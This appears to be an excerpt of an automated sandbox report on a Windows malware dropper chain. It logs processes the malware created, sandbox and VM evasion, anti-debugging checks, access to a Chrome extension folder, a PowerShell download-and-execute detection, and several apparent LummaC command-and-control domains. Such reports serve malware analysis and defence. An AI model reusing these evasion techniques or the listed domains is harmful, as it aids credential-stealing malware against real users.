Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\is-1GO4T.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-4EM98.tmp\_isetup\_iscrypt.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\is-RGF1U.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-RAEVT.tmp\stories.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\WinSparkle.dll (copy)	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe TID: 2108	Thread sleep time: -34017s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7516	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2360	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7848	Thread sleep count: 73 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7848	Thread sleep time: -146073s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7872	Thread sleep count: 71 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7872	Thread sleep time: -142071s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7876	Thread sleep count: 54 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7876	Thread sleep time: -108054s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5752	Thread sleep count: 305 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5752	Thread sleep time: -9150000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7860	Thread sleep count: 64 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7860	Thread sleep time: -128064s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7844	Thread sleep count: 7085 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7844	Thread sleep time: -14177085s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7072	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7844	Thread sleep count: 1463 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7844	Thread sleep time: -2927463s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe TID: 7468	Thread sleep count: 9868 > 30
Source: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe TID: 7468	Thread sleep time: -19736000s >= -30000s
Source: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe TID: 3708	Thread sleep count: 48 > 30
Source: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe TID: 3708	Thread sleep time: -2880000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe TID: 7940	Thread sleep time: -36018s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe TID: 7996	Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe TID: 7976	Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe TID: 7716	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe TID: 6820	Thread sleep time: -32016s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe TID: 6848	Thread sleep time: -32016s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe TID: 5800	Thread sleep time: -210000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe TID: 6696	Thread sleep time: -38019s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe TID: 3344	Thread sleep time: -210000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe TID: 2252	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe TID: 5844	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe TID: 5516	Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe TID: 7956	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Last function: Thread delayed

Source: C:\Users\user\DocumentsGDHIDHIEGI.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6FEBF0 PR_GetNumberOfProcessors,GetSystemInfo,

0_2_6C6FEBF0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe	Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: file.exe, file.exe, 00000000.00000002.2043433049.0000000000BC3000.00000040.00000001.01000000.00000003.sdmp, DocumentsGDHIDHIEGI.exe, DocumentsGDHIDHIEGI.exe, 00000009.00000002.2128632112.0000000000875000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, skotes.exe, 0000000A.00000002.2143392308.00000000007C5000.00000040.00000001.01000000.0000000E.sdmp, e708276138.exe, 00000013.00000002.2955785309.00000000064E1000.00000040.00000800.00020000.00000000.sdmp, e708276138.exe, 00000013.00000002.2904791455.0000000000483000.00000040.00000001.01000000.00000014.sdmp, df5dd36577.exe, 00000014.00000002.2675797848.0000000000483000.00000040.00000001.01000000.00000015.sdmp, e708276138.exe, 00000015.00000002.3035841390.0000000000483000.00000040.00000001.01000000.00000014.sdmp, e708276138.exe, 00000015.00000002.3054715992.0000000006431000.00000040.00000800.00020000.00000000.sdmp, e708276138.exe, 00000017.00000002.2933229188.0000000000483000.00000040.00000001.01000000.00000014.sdmp, 76f1524c8d.exe, 00000018.00000002.2881979905.0000000000791000.00000040.00000001.01000000.00000016.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: e708276138.exe, 0000001E.00000002.3103547372.00000000010DB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(
Source: file.exe, 00000000.00000002.2044630050.0000000001683000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94
Source: e708276138.exe, 00000015.00000002.3040356787.00000000013C1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: df5dd36577.exe, 00000014.00000002.2677024586.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWolw
Source: e708276138.exe, 00000017.00000002.2955044148.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0I
Source: file.exe, 00000000.00000002.2065174879.0000000023A62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\$
Source: df5dd36577.exe, 00000019.00000002.2861182508.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2044630050.0000000001683000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000013.00000002.2912096877.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000013.00000002.2912096877.0000000001300000.00000004.00000020.00020000.00000000.sdmp, df5dd36577.exe, 00000014.00000002.2677024586.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, df5dd36577.exe, 00000014.00000002.2677024586.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000015.00000002.3040356787.00000000012FB000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000015.00000002.3040356787.0000000001357000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000017.00000003.2910583700.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, e708276138.exe, 00000017.00000002.2957132719.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, df5dd36577.exe, 00000019.00000002.2861182508.0000000000D88000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2044630050.0000000001654000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh
Source: e708276138.exe, 00000015.00000002.3040356787.00000000013C1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\J
Source: e708276138.exe, 00000015.00000002.3040356787.0000000001357000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWL
Source: file.exe, 00000000.00000002.2043433049.0000000000BC3000.00000040.00000001.01000000.00000003.sdmp, DocumentsGDHIDHIEGI.exe, 00000009.00000002.2128632112.0000000000875000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 0000000A.00000002.2143392308.00000000007C5000.00000040.00000001.01000000.0000000E.sdmp, e708276138.exe, 00000013.00000002.2955785309.00000000064E1000.00000040.00000800.00020000.00000000.sdmp, e708276138.exe, 00000013.00000002.2904791455.0000000000483000.00000040.00000001.01000000.00000014.sdmp, df5dd36577.exe, 00000014.00000002.2675797848.0000000000483000.00000040.00000001.01000000.00000015.sdmp, e708276138.exe, 00000015.00000002.3035841390.0000000000483000.00000040.00000001.01000000.00000014.sdmp, e708276138.exe, 00000015.00000002.3054715992.0000000006431000.00000040.00000800.00020000.00000000.sdmp, e708276138.exe, 00000017.00000002.2933229188.0000000000483000.00000040.00000001.01000000.00000014.sdmp, 76f1524c8d.exe, 00000018.00000002.2881979905.0000000000791000.00000040.00000001.01000000.00000016.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: DocumentsGDHIDHIEGI.exe, 00000009.00000003.2092107704.000000000163A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\eo

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe	Process queried: DebugPort

Source: C:\Users\user\DocumentsGDHIDHIEGI.exe

Code function: 9_2_054E06DE rdtsc

9_2_054E06DE

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C7CAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6C7CAC62

Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Code function: 9_2_006B652B mov eax, dword ptr fs:[00000030h]	9_2_006B652B
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Code function: 9_2_006BA302 mov eax, dword ptr fs:[00000030h]	9_2_006BA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_0060A302 mov eax, dword ptr fs:[00000030h]	10_2_0060A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_0060652B mov eax, dword ptr fs:[00000030h]	10_2_0060652B

Source: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe

Process token adjusted: Debug

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C7CAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6C7CAC62

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: file.exe PID: 4940, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: df5dd36577.exe PID: 6216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: df5dd36577.exe PID: 7676, type: MEMORYSTR

LummaC encrypted strings found

Source: e708276138.exe, 00000013.00000002.2903704592.00000000002B1000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: faintbl0w.sbs
Source: e708276138.exe, 00000013.00000002.2903704592.00000000002B1000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: 300snails.sbs
Source: e708276138.exe, 00000013.00000002.2903704592.00000000002B1000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: 3xc1aimbl0w.sbs
Source: e708276138.exe, 00000013.00000002.2903704592.00000000002B1000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: thicktoys.sbs

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsGDHIDHIEGI.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\DocumentsGDHIDHIEGI.exe "C:\Users\user\DocumentsGDHIDHIEGI.exe"	Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1006431001\stories.exe "C:\Users\user\AppData\Local\Temp\1006431001\stories.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe "C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe "C:\Users\user\AppData\Local\Temp\1006441001\df5dd36577.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe "C:\Users\user\AppData\Local\Temp\1006443001\76f1524c8d.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 pause shine-encoder_11152
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=e708276138.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=e708276138.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=e708276138.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=e708276138.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1006440001\e708276138.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C814760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

0_2_6C814760

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6F1C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,

0_2_6C6F1C30

Source: e708276138.exe, 00000013.00000002.2955785309.00000000064E1000.00000040.00000800.00020000.00000000.sdmp, e708276138.exe, 00000013.00000002.2904791455.0000000000483000.00000040.00000001.01000000.00000014.sdmp	Binary or memory string: Program Manager
